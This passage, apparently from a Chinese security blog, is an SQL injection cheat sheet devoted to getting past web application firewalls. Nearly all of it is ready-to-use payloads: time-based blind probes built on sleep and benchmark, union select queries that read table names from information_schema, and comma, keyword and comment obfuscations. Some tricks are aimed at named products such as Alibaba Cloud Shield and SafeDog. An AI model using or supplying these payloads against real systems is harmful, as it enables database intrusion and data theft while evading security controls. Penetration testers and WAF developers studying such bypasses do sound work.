%23%09\%0aif%0a%0c(0,0,1121212-+++++++sleep%23%09\%0a%0a%0c(0.2)  orDer%0a%0dBy floor%0a%0c(1)%23%31%27%27%2d%2d%20%20%20%2b</span><br><span class="line"></span><br><span class="line">  四。最终payload( --%0a1.1e--%0a,多重if 绕过单关键字：sleep)</span><br><span class="line">第一种</span><br><span class="line">-1%27regexp&quot;[...%0a%23benchmark]&quot;or %23%09\%0aif%0a%0c(0,0, %23%09\%0a%23%09\%0a%23%09\%0aif(0,0,if(0,0,if(0,0,if(ascii(substr(database(),1,1))&gt;1,%23%09\%0a--%0a--%0a1.1e--%0aslEep%23%09\%0a%23%09\%0a(0.3%23orDer%0a%23%0dBy floor%0a%23%0c(1)%0a),0)))</span><br><span class="line">))  orDer%0a%0dBy floor%0a%0c(1)%23%31%27%27%2d%2d%20%20%20%2b</span><br><span class="line">第二种</span><br><span class="line">-1%27or --%0a1.1e--%0a--+%09%0c%0b%0d%0%99!@$~%^*()_[]|:&#39;&quot;,.&#x2F;%26\%0aif%0a%0c(0,0, --%0a1.1e--%0a--+%09%0c%0b%0d%0%99!@$~%^*()_[]|:&#39;&quot;,.&#x2F;%26\%0aif(0,0,if(0,0,if(0,0,if(ascii(substr(database(),1,1))&gt;1,--%0a1.1e--%0a--+%09%0c%0b%0d%0%99!@$~%^*()_[]|:&#39;&quot;,.&#x2F;%26\%0a--%0a--%0a1.1e--%0aslEep--+%09%0c%0b%0d%0%99!@$~%^*()_[]|:&#39;&quot;,.&#x2F;%26\%0a(0.5),0)))</span><br><span class="line">))  orDer%0a%0dBy floor%0a%0c(1)--+%31%27%27%2d%2d%20%20%20%2b</span><br><span class="line"></span><br><span class="line">k. 对 select 进行扩展 </span><br><span class="line">select all</span><br><span class="line">select distinct</span><br><span class="line">select distinctrow</span><br><span class="line"></span><br><span class="line">L. SQL UNION ALL 语法，用于模糊匹配 union select</span><br><span class="line">SELECT column_name(s) FROM table_name1</span><br><span class="line">UNION ALL</span><br><span class="line">SELECT column_name(s) FROM table_name2</span><br><span class="line"></span><br><span class="line">M. select top语法，(sqlserver的语法)</span><br><span class="line">select top 1 1 from emails</span><br></pre></td></tr></table></figure>

<h3 id="逗号绕过"><a href="#逗号绕过" class="headerlink" title="逗号绕过"></a>逗号绕过</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">a. from ... for ... 替换 substr()函数的,1,1：</span><br><span class="line">select substr((select database()) from 1 for 1);    # s		</span><br><span class="line">select substr((select database()) from 2 for 1);    # e</span><br><span class="line">......</span><br><span class="line"></span><br><span class="line">b. limit处的逗号：</span><br><span class="line"> limit 1 offset 0</span><br><span class="line"></span><br><span class="line">c. 字符串截取处的逗号 mid处的逗号：</span><br><span class="line">mid(version() from 1 for 1)</span><br><span class="line"></span><br><span class="line">d. union处的逗号： 通过join拼接。</span><br><span class="line">SELECT * FROM admin WHERE username &#x3D; 1 union select * from (select 1)a join(select&#123;x schema_name&#125; from information_schema.SCHEMATA limit 1,1)b</span><br><span class="line"></span><br><span class="line">e.操作符&lt;&gt;被过滤：</span><br><span class="line">select * from users where id&#x3D;1 and greatest(ascii(substr(database(),0,1)),64)&#x3D;64</span><br><span class="line"></span><br><span class="line">总结：使用greatest()绕过比较操作符。</span><br><span class="line">greatest(n1,n2,n3,等)函数返回输入参数(n1,n2,n3,等)的最大值。那么上面的这条sql语句可以使用greatest变为如下的子句:</span><br></pre></td></tr></table></figure>

<p><code>&#39;and 1=1-- - 绕过</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#39;%261-- -</span><br><span class="line">&#39;%26true-- -</span><br><span class="line">&#39;%260-- -</span><br><span class="line">&#39;%26false-- -</span><br><span class="line">&#39;Xor 1-- -</span><br><span class="line">&#39;Xor true-- -</span><br><span class="line">1&#39;or -1&#x3D;-1-- -</span><br><span class="line">1&#39;or -0&#x3D;-0-- -</span><br><span class="line">1&#39;or &#x2F;*!1&#x3D;1*&#x2F;-- -</span><br><span class="line">&#x2F;*!11440OR*&#x2F;</span><br><span class="line">&#x2F;*!11440AND*&#x2F;</span><br></pre></td></tr></table></figure>

<p><code>order by 绕过</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">%23%0a绕过：</span><br><span class="line">order%23%0aby 3</span><br><span class="line">内敛注释加注释绕过：(和“21.注释符扩展”用法类似)</span><br><span class="line">1&#39;&#x2F;*!order &#x2F;*!&#x2F;*&#x2F;**&#x2F;by*&#x2F;4-- -</span><br><span class="line">1&#39;&#x2F;*!order &#x2F;*&#x2F;*%&#x2F;**&#x2F;by*&#x2F;4-- -</span><br><span class="line">1&#39;&#x2F;*!order &#x2F;*!&#x2F;*&#x2F;**&#x2F;&#x2F;**&#x2F;by*&#x2F;4-- -</span><br><span class="line">1&#39;&#x2F;*!order &#x2F;*!&#x2F;*&#x2F;**&#x2F;&#x2F;*&#x2F;**&#x2F;by*&#x2F;4-- -</span><br></pre></td></tr></table></figure>

<p><code>系统函数绕过</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">version ()      #直接空格</span><br><span class="line">user%0a()       #这个地方%0a~%20有很多，类似绕过空格</span><br><span class="line">user&#x2F;*!*&#x2F;()     #内敛注释</span><br><span class="line">database&#x2F;**&#x2F;()  #注释符</span><br><span class="line"></span><br><span class="line">注释符扩展方法绕过：(&quot;21.注释符扩展&quot; 所说的除了 &quot;A(DC)&quot; 不能用外，其他都能用)</span><br><span class="line">用法举例：  database&quot;A(B)&quot;() </span><br><span class="line"></span><br><span class="line">对括号混淆：</span><br><span class="line">user() 	&#x3D;&gt;	user(%0a &#x2F;*!80000aaa*&#x2F;)</span><br><span class="line"></span><br><span class="line">首部添加 REGEXP &quot;[…%0a%23]&quot; 欺骗WAF</span><br></pre></td></tr></table></figure>

<p><code>if关键字绕过</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">if(condition,1,0) 	&lt;&#x3D;&gt; 	case when condition then 1 else 0 end</span><br><span class="line"></span><br><span class="line">0&#39; or if((ascii(substr((select database()),1,1))&gt;97),1,0)#  </span><br><span class="line">&#x3D;&gt;</span><br><span class="line">0&#39; or case when ascii(substr((select database()),1,1))&gt;97 then 1 else 0 end#</span><br></pre></td></tr></table></figure>

<h3 id="冷门函数-字符-运算符绕过"><a href="#冷门函数-字符-运算符绕过" class="headerlink" title="冷门函数/字符/运算符绕过"></a><strong>冷门函数/字符/运算符绕过</strong></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line">a. floor:</span><br><span class="line">updatexml()，extractvalue() , xmlelement() </span><br><span class="line">GeometryCollection() , polygon() , linestring() , multipoint() , multilinestring() , multipolygon()，exp()</span><br><span class="line">ST_LatFromGeoHash()（mysql&gt;&#x3D;5.7.x），ST_LongFromGeoHash（mysql&gt;&#x3D;5.7.x）</span><br><span class="line">GTID (MySQL &gt;&#x3D; 5.6.X - 显错&lt;&#x3D;200)</span><br><span class="line"></span><br><span class="line">b. substring():</span><br><span class="line">Mid()&#x2F;mid() ，Substr()&#x2F;substr() ，substring() , Lpad()&#x2F;lpad() ，Rpad()&#x2F;rpad() ，Left()&#x2F;left()</span><br><span class="line">insert()函数的妙用：</span><br><span class="line">select insert(insert((select database()),1,0,space(0)),2,222,space(0));    &#x2F;&#x2F; s</span><br><span class="line">select insert(insert((select database()),1,1,space(0)),2,222,space(0));    &#x2F;&#x2F; e</span><br><span class="line"></span><br><span class="line">c. concat():</span><br><span class="line">concat_ws() ，group_concat()</span><br><span class="line"></span><br><span class="line">d. ascii():</span><br><span class="line">hex(),bin(),conv(hex(c),16,10),ord()</span><br><span class="line"></span><br><span class="line">e. sleep():</span><br><span class="line">sleep(find_in_set(mid(@@version, 1, 1), &#39;0,1,2,3,4,5,6,7,8,9,.&#39;));</span><br><span class="line">benchmark()</span><br><span class="line">benchmark(10000000,ENCODE(&#39;hello&#39;,&#39;goodbye&#39;))</span><br><span class="line">BENCHMARK(10000000, CONCAT(&#39;Hello&#39;, &#39; World&#39;))</span><br><span class="line">BENCHMARK(10000000, MD5(&#39;password&#39;))</span><br><span class="line">benchmark(10000000,SHA1(1))</span><br><span class="line">BENCHMARK(10000000, (2 + 3) * (4 - 2))</span><br><span class="line">BENCHMARK(10000000, (SELECT COUNT(*) FROM users))</span><br><span class="line">GET_LOCK(str, timeout)</span><br><span class="line">其中，str是用作锁名的字符串，timeout是在等待获取锁时的超时时间（秒）。</span><br><span class="line"></span><br><span class="line">f. limit 0,1:</span><br><span class="line">limit 1 offset 0</span><br><span class="line"></span><br><span class="line">g. and:</span><br><span class="line">and  &#x3D;&#x3D;&gt; &amp;&amp; </span><br><span class="line"></span><br><span class="line">h. or:</span><br><span class="line">or &#x3D;&#x3D;&gt; ||</span><br><span class="line"></span><br><span class="line">i.&#39;&#x3D;&#39; :</span><br><span class="line">&#39;&#x3D;&#39;  &#x3D;&#x3D;&gt;  &#39;&lt;&#39;,&#39;&gt;&#39;,like,in</span><br><span class="line"></span><br><span class="line">if(abs(strcmp((ascii(mid(user()from(1)for(2)))),114))-1,1,0)</span><br><span class="line"></span><br><span class="line">find_in_set()</span><br><span class="line"></span><br><span class="line">select * from ctf_test where user&#x3D;&#39;2&#39; and if(locate(&#39;ro&#39;, substring(user(),1,2))&gt;0,1,0);</span><br><span class="line"></span><br><span class="line">select * from ctf_test where user&#x3D;&#39;2&#39; and if(position(&#39;ro&#39; IN substring(user(),1,2))&gt;0,1,0);</span><br><span class="line"></span><br><span class="line">select * from ctf_test where user&#x3D;&#39;2&#39; and if(instr(substring(user(),1,2),&#39;ro&#39;)&gt;0,1,0);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">j. @符号，select@^1.from users; @用于变量定义如@var_name，一个@表示用户定义，@@表示系统变量.</span><br><span class="line">比如:</span><br><span class="line">version() &#x3D;&#x3D;&gt; @@version</span><br><span class="line"></span><br><span class="line">datadir() &#x3D;&#x3D;&gt; @@datadir</span><br><span class="line"></span><br><span class="line">user() &#x3D;&#x3D;&gt; @@user</span><br><span class="line"></span><br><span class="line">k. &#39;&gt;&#39;和&#39;&lt;&#39;:</span><br><span class="line">select least(ord(&#39;r&#39;),115);</span><br><span class="line">select greatest(ord(&#39;r&#39;),113);</span><br><span class="line"></span><br><span class="line">select ord(&#39;r&#39;) between n and m;</span><br></pre></td></tr></table></figure>

<h3 id="混淆专题"><a href="#混淆专题" class="headerlink" title="混淆专题"></a>混淆专题</h3><p><strong>1. regexp混淆</strong></p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">a. 基于以下语句进行执行,后面省略了&#123;or if...&#125;：</span><br><span class="line">-1%27regexp"[...%0a%23]"or if(0,0,1121212-+++++++sleep(0.03))%23</span><br><span class="line">------------------------------------------------------------------------我是分割线</span><br><span class="line"></span><br><span class="line">b. 三种基础混淆:</span><br><span class="line">-1%27regexp'[...]'		-1%27regexp"'[...]" 	-1%27regexp"'[...]'"</span><br><span class="line"></span><br><span class="line">以此类推可以一直加,可以放前面/后面/前后面:(不达到get/post上限即可)</span><br><span class="line">-1%27regexp"''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''[...]''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''"</span><br><span class="line">------------------------------------------------------------------------我是分割线</span><br><span class="line"></span><br><span class="line">c. 升级混淆:</span><br><span class="line">regexp"'&#123;有效载荷存放的位置1&#125;[&#123;有效载荷存放的位置2&#125;]&#123;有效载荷存放的位置3&#125;'"</span><br><span class="line">&#123;有效载荷存放的位置2&#125; 不能设置 "</span><br><span class="line"></span><br><span class="line">有效载荷(一行五个有效载荷):</span><br><span class="line">/<span class="emphasis">*!*</span>/	--%20-	--%2b	--%20	--'</span><br><span class="line">%2%2e	1E0		%5cN	()		%7b%7d</span><br><span class="line">0x		%0		%23		%3d		)</span><br><span class="line">&#123;		&#125;		%		|		,</span><br><span class="line">~		/		%60		%2e		!</span><br><span class="line">@		;		&amp;		<span class="xml"><span class="tag">&lt;		&gt;</span></span></span><br><span class="line">^		+		-		%2b		*</span><br><span class="line">任意字母/数字	</span><br><span class="line">Ã°ÂÂÂÃ°ÂÂÂÃ°ÂÂÂÃ°ÂÂÂðððð</span><br><span class="line">😀😁😂😃🐎</span><br><span class="line"></span><br><span class="line">d. 递归混淆</span><br><span class="line">里面塞超多 [] 进行欺骗,结合升级混淆进行欺骗</span><br><span class="line">regexp[[[[[]]]]]</span><br></pre></td></tr></table></figure>

<p><strong>2. if混淆</strong></p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">a. 基础语句</span><br><span class="line">if(0,0,&#123;有效载荷1&#125;-+++++++&#123;有效载荷2&#125;sleep(0.05)&#123;有效载荷3&#125;)</span><br><span class="line">if(0,0,&#123;有效载荷1&#125;-+-+-+-+-+-+-+&#123;有效载荷2&#125;sleep(0.05)&#123;有效载荷3&#125;)</span><br><span class="line">if(0,0,&#123;有效载荷1&#125;--%0a--%0a1.1e--%0a&#123;有效载荷2&#125;sleep(0.05)&#123;有效载荷3&#125;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">有效载荷1(4个):</span><br><span class="line">1E0		~		!	任意长度数字	</span><br><span class="line"></span><br><span class="line">有效载荷2(4个):</span><br><span class="line">--+		!	/<span class="emphasis">**/	/*</span>!*/</span><br><span class="line"></span><br><span class="line">有效载荷3(4个):</span><br><span class="line">--%0a1.1e-		--%0a1.1e+		--%0a1.1e%0		--%0a1.1e%2%2e</span><br></pre></td></tr></table></figure>

<p><strong>3. 自定义变量@混淆</strong></p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br></pre></td><td class="code"><pre><span class="line">k.阿里云盾bypass</span><br><span class="line">原始payload:(union select版)</span><br><span class="line">-1'or@a:=(select @b:=<span class="code">`table_name`</span>from&#123;a information_schema.<span class="code">`TABLES`</span> &#125;limit 0,1)union select '1',2,@a--+</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">变量嵌套:</span><br><span class="line">-1'or@a:=(@b:=(select <span class="code">`table_name`</span>from information_schema.<span class="code">`TABLES`</span>limit 0,1))union select '1',2,@a--+</span><br><span class="line"></span><br><span class="line">-1' OR 1=1 UNION SELECT 2, GROUP<span class="emphasis">_CONCAT(`table_</span>name<span class="code">`), 3 FROM information_schema.`</span>TABLES`-- -</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">(无union select版)</span><br><span class="line">-1%27or @a:=--%0a@b:=--%0a--%0a1.1e--%0aif(0,0,sleep(0.05))%23</span><br><span class="line"></span><br><span class="line">基础语句:</span><br><span class="line">-1'or&#123;有效载荷1&#125;--+</span><br><span class="line"></span><br><span class="line">有效载荷1:</span><br><span class="line">1.混淆：</span><br><span class="line">1.1 能正常执行：</span><br><span class="line">@a:=	解析结果正常		@a+:=	解析结果正常		@a:=+	解析结果正常</span><br><span class="line">@a:=-	解析结果为-0		 @a:=~	解析结果为Dumb	 @a:=!	解析结果为Dumb</span><br><span class="line">~@a:=	解析结果为Dumb	 !@a:=	解析结果为Dumb	 -@a:=	解析结果正常</span><br><span class="line">+@a:=	解析结果正常</span><br><span class="line"></span><br><span class="line">1.2 不能正常执行,但无报错,没准有奇效：</span><br><span class="line">@a$=	@a!=	@a+=	@a<span class="xml"><span class="tag">&lt;<span class="name">=</span>	@<span class="attr">a</span>&gt;</span></span>=	@a.=	@a_=	@a！=	@a·=	@a￥=</span><br><span class="line">@a…=	@a……=	@a（=	@a——=	@a—=	@a-=	@a【】=	@a、=	@a“”=	@a；=</span><br><span class="line">@a《》=	@a，=	@a。=	@a？=</span><br><span class="line"></span><br><span class="line">1.3 执行sleep:</span><br><span class="line"></span><br><span class="line">@a:=-(1)union select '1',2,@a 						解析结果为Dumb</span><br><span class="line">@a:=-(if(0,0,sleep(0)))union select '1',2,@a </span><br><span class="line">@a:=+(if(0,0,sleep(0)))union select '1',2,@a </span><br><span class="line">@a:=~(if(0,0,sleep(0)))union select '1',2,@a </span><br><span class="line">@a:=!(if(0,0,sleep(0)))union select '1',2,@a </span><br><span class="line"></span><br><span class="line">@a:=sleep(0.04)|~(if(0,0,sleep(0)))union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)|+(if(0,0,sleep(0)))union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)||(if(0,0,sleep(0)))union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)|!(if(0,0,sleep(0)))union select '1',2,@a</span><br><span class="line"></span><br><span class="line">1.3 精简版：</span><br><span class="line">@a:=sleep(0.04)|!(1)union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)|~(1)union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)|-(1)union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)|+(1)union select '1',2,@a</span><br><span class="line"></span><br><span class="line">1.4 最精简版+混淆：</span><br><span class="line">@a:=sleep(0.04)%(1)union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)&amp;(1)union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)*(1)union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)=(1)union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)&gt;(1)union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)<span class="xml"><span class="tag">&lt;<span class="name">(1)union</span> <span class="attr">select</span> '<span class="attr">1</span>',<span class="attr">2</span>,@<span class="attr">a</span></span></span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)/(1)union select '1',2,@a</span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)^(1)union select '1',2,@a</span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)-(1)union select '1',2,@a</span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)+(1)union select '1',2,@a</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="xml">1.5 sleep可以放前面或后面:</span></span><br><span class="line"><span class="xml">放前面：</span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)%&#123;x 1&#125;union select '1',2,@a</span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)&amp;&#123;x 1&#125;union select '1',2,@a</span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)*&#123;x 1&#125;union select '1',2,@a</span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)=&#123;x 1&#125;union select '1',2,@a</span></span><br><span class="line"><span class="xml">@a:=sleep(0.04)&gt;</span>&#123;x 1&#125;union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)/&#123;x 1&#125;union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)^&#123;x 1&#125;union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)-&#123;x 1&#125;union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)+&#123;x 1&#125;union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)|&#123;x 1&#125;union select '1',2,@a</span><br><span class="line">@a:=sleep(0.04)<span class="xml"><span class="tag">&lt;<span class="name">&#123;x</span> <span class="attr">1</span>&#125;<span class="attr">union</span> <span class="attr">select</span> '<span class="attr">1</span>',<span class="attr">2</span>,@<span class="attr">a</span></span></span></span><br><span class="line"></span><br><span class="line"><span class="xml">放后面：(能用于混淆的字符与上同)</span></span><br><span class="line"><span class="xml">@a:=1%&#123;x sleep(0.04)&#125;union select '1',2,@a</span></span><br><span class="line"></span><br><span class="line"><span class="xml">1.5 成功执行order by :</span></span><br><span class="line"><span class="xml">@a:=(1)%&#123;x 1&#125;order by 3</span></span><br><span class="line"></span><br><span class="line"><span class="xml">2.迭代混淆：</span></span><br><span class="line"><span class="xml">@a=@a=</span></span><br><span class="line"><span class="xml">@a$=@a$=</span></span><br><span class="line"><span class="xml">@a:=-@a:= 	解析结果-0</span></span><br><span class="line"><span class="xml">@a:=~@a:=	解析结果为Dumb</span></span><br><span class="line"><span class="xml">@a:=!@a:=	解析结果为Dumb</span></span><br><span class="line"><span class="xml">@a:=+@a:=	解析结果正常</span></span><br><span class="line"></span><br><span class="line"><span class="xml">~@a:=!@a:=  解析结果Dumb</span></span><br><span class="line"><span class="xml">-@a:=!@a:=  解析结果Dumb</span></span><br><span class="line"><span class="xml">+@a:=!@a:=  解析结果Dumb</span></span><br><span class="line"><span class="xml">!@a:=!@a:=  解析结果为0</span></span><br></pre></td></tr></table></figure>





<h3 id="HTTP数据包压缩-编码-文章指路"><a href="#HTTP数据包压缩-编码-文章指路" class="headerlink" title="HTTP数据包压缩/编码,文章指路"></a>HTTP数据包压缩/编码,<a href="https://xz.aliyun.com/t/10278" target="_blank" rel="noopener">文章指路</a></h3><p>数据包中添加<br>    “Accept-Encoding: deflate”<br>或 “Accept-Encoding: gzip”<br>或 “content-Encoding: deflate”<br>或 “content-Encoding: gzip”</p>
<h3 id="注释符扩展"><a href="#注释符扩展" class="headerlink" title="注释符扩展"></a>注释符扩展</h3><p><strong>内联注释绕过</strong>:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">内联注释:   &#x2F;*!*&#x2F;</span><br><span class="line"></span><br><span class="line">例如:</span><br><span class="line">当前mysql数据库的版本是5.1.73时</span><br><span class="line"></span><br><span class="line">当内联注释中的版本设置为50173时，与当前mysql数据库版本相同，会正常执行内联注释中的sql语句.</span><br><span class="line">&#x2F;*!50173sleep(3)*&#x2F;, 此注释里的语句将被执行.</span><br><span class="line"></span><br><span class="line">当内联注释中的版本设置为50170时，小于当前mysql数据库版本50173,会正常执行内联注释中的sql语句.</span><br><span class="line">&#x2F;*!50170sleep(3)*&#x2F;, 此注释里的语句将被执行.</span><br><span class="line"></span><br><span class="line">但是当内联注释中的版本大于当前mysql数据库版本时，会报错</span><br><span class="line">&#x2F;*!50183sleep(3)*&#x2F;, 此注释里的语句将被执行.</span><br></pre></td></tr></table></figure>



<p><code>可用于union select Bypass</code></p>
<p>总结：<br>内联注释里不能套 内联注释<br>块注释里不能套 块注释/内联注释<br>且都只能套一层<br><code>下面是自己推导出的一些能用的混淆注释，也许能达到欺骗WAF的效果，高级用法自行探索</code><br>(可能也没什么用)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">设&#x2F;*!*&#x2F; &#x3D;&gt; A     &#x2F;**&#x2F; &#x3D;&gt; B      &#x2F;*! &#x3D;&gt; C    &#x2F;* &#x3D;&gt; D    </span><br><span class="line">则</span><br><span class="line">&quot;&#x2F;* &#x2F;*!*&#x2F;&quot;        &#x3D;&gt; A(B)   1  </span><br><span class="line">&quot;&#x2F;*! &#x2F;*!*&#x2F;&quot;       &#x3D;&gt; CA     2</span><br><span class="line">&quot;&#x2F;*! &#x2F;*! &#x2F;**&#x2F; *&#x2F;&quot; &#x3D;&gt; CA(B)  3</span><br><span class="line">&quot;&#x2F;*! &#x2F;*! &#x2F;**&#x2F; *&#x2F;&quot; &#x3D;&gt; DCA    4</span><br><span class="line">&quot;&#x2F;*! &#x2F;* &#x2F;*! *&#x2F;&quot;   &#x3D;&gt; A(DC)  5  [只能放其他注释的头部，单独使用会报错]</span><br><span class="line">&quot;&#x2F;*&#x2F;* &#x2F;*!*&#x2F;&quot;      &#x3D;&gt; DDA    6</span><br><span class="line">&quot;&#x2F;* &#x2F;*!*&#x2F;&quot;        &#x3D;&gt; DA     7</span><br></pre></td></tr></table></figure>

<p>union select Bypass 安全狗正则思路：将union select 拆开<br>(可延展)</p>
